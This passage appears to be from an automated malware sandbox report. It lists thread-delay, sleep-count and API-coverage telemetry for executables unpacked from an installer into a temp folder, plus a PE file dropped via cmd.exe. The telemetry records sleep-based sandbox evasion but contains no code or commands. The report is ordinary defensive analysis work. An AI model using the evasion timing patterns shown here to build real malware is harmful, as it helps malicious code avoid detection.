                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeMemory allocated: 5060000 memory reserve | memory write watch
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 599886
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 599765
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 599655
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 599543
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 599424
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 599303
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 599172
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 599048
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 598922
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 598812
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 598671
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 598333
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 598187
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 597992
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 597867
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 597746
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 597578
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 597440
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 597307
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 597182
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 597015
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 596892
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 596771
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 596625
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 596497
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 596359
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 596156
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 596020
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 595859
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 595250
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 594844
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 594699
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 594578
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 594422
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 594265
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 594071
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 593916
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 593784
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 593625
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 593484
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 593355
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 593249
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 593061
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 592578
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 592047
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 591859
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 591636
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 591483
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 591353
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 591187
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 591031
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 590895
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 590703
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 590527
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 590366
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 590233
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 590062
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 589265
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 589085
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 588875
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 588716
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 588594
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 588464
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 588328
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 588015
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 587703
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 587500
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 587340
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 587193
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 587015
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 586554
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 586163
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 586009
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 585883
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 585765
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 585624
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 585482
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 585373
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 585264
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 585154
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 585040
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 584922
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 584811
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 584702
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 584591
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 584470
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 584344
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 584234
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 584115
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 583828
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 583620
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 583469
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 583233
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 583123
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 583015
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582905
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582795
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582684
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582577
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582466
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582330
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582203
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 582093
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 581982
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 581874
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 581765
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 581656
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeThread delayed: delay time: 581547
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 599844
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 599708
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 599485
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 599313
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598985
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598678
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598486
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598338
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598232
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598123
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 598011
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 597825
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 597683
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 597556
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 597437
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeThread delayed: delay time: 597317
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2049Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 361Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeWindow / User API: threadDelayed 5641
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exeWindow / User API: threadDelayed 3928
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeWindow / User API: threadDelayed 5728
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeWindow / User API: threadDelayed 4254
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeWindow / User API: foregroundWindowGot 1711
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exeWindow / User API: threadDelayed 1122
                  Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 433
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 719
                  Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 714
                  Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\r6f7sE.IJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeAPI coverage: 3.9 %
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exeAPI coverage: 3.7 %
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeAPI coverage: 8.6 %
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep count: 2049 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep count: 361 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2708Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe TID: 7988Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe TID: 7324Thread sleep count: 175 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe TID: 7324Thread sleep time: -5250000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe TID: 7364Thread sleep count: 161 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe TID: 7364Thread sleep time: -4830000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe TID: 7908Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe TID: 7324Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe TID: 7268Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe TID: 7944Thread sleep count: 143 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe TID: 7944Thread sleep time: -85800000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep count: 35 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -32281802128991695s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 1704Thread sleep count: 5641 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -599886s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -599765s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -599655s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -599543s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 1704Thread sleep count: 3928 > 30
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -599424s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -599303s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -599172s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -599048s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -598922s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -598812s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -598671s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -598333s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -598187s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -597992s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -597867s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -597746s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -597578s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -597440s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -597307s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -597182s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -597015s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -596892s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -596771s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -596625s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -596497s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -596359s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -596156s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -596020s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -595859s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -595250s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -594844s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -594699s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -594578s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -594422s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -594265s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -594071s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -593916s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -593784s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -593625s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -593484s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -593355s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -593249s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -593061s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -592578s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -592047s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -591859s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -591636s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -591483s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -591353s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -591187s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -591031s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -590895s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -590703s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -590527s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -590366s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -590233s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -590062s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -589265s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -589085s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -588875s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -588716s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -588594s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -588464s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -588328s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -588015s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -587703s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -587500s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -587340s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -587193s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe TID: 5664Thread sleep time: -587015s >= -30000s
